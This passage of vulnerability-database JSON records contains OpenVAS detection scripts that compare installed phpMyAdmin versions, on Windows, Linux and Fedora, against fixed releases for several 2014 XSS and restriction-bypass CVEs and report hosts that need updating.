\"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.8.1, 4.1.x before 4.1.14.4 and 4.0.x before 4.0.10.3\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.8.1, 4.1.14.4 or 4.0.10.3.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.0.10.3\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.8.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:56", "description": "phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112018", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-6300_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free 
software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112018\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:48:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_name(\"phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.8.1, 4.1.x before 4.1.14.4 and 4.0.x before 4.0.10.3\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.8.1, 4.1.14.4 or 4.0.10.3.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.0.10.3\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.8.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:39", "description": "Check the version of phpMyAdmin", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-11983", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868390", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868390", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-11983\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868390\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-12 05:57:00 +0200 (Sun, 12 Oct 2014)\");\n script_cve_id(\"CVE-2014-7217\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-11983\");\n script_tag(name:\"summary\", value:\"Check the version of phpMyAdmin\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11983\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140407.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.9.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:24", "description": "Check the version of phpMyAdmin", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2014-12085", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868359", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2014-12085\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868359\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:24 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7217\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2014-12085\");\n script_tag(name:\"summary\", value:\"Check the version of phpMyAdmin\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12085\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139903.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.2.9.1~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:14", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112015", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112015", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_oct14_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112015\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 11:38:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-11/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.9.1, 4.1.x prior to 4.1.14.5, and 4.0.x prior to 4.0.10.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.9.1, 4.1.14.5 or 4.0.10.4.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.4\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.4\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.5\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.5\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.9.1\" ) ) {\n vuln = TRUE;\n fix = \"4.2.9.1\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:26", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112014", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_oct14_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the 
Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112014\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 11:38:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Oct14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-11/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", 
value:\"phpMyAdmin 4.2.x prior to 4.2.9.1, 4.1.x prior to 4.1.14.5, and 4.0.x prior to 4.0.10.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.9.1, 4.1.14.5 or 4.0.10.4.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.4\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.4\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.5\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.5\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.9.1\" ) ) {\n vuln = TRUE;\n fix = \"4.2.9.1\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:37", "description": "phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4987"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112016", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4987_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)\n#\n# Authors:\n# Adrian 
Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112016\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:18:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2014-4987\");\n script_bugtraq_id(68804);\n script_name(\"phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\");\n\n 
script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6 and 4.1.x before 4.1.14.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or 4.1.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:34", "description": "phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4987"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310112017", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112017", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4987_lin.nasl 12106 
2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112017\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:18:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2014-4987\");\n script_bugtraq_id(68804);\n script_name(\"phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", 
\"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6 and 4.1.x before 4.1.14.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or 4.1.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:26", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple XSS Vulnerabilities - 2 - 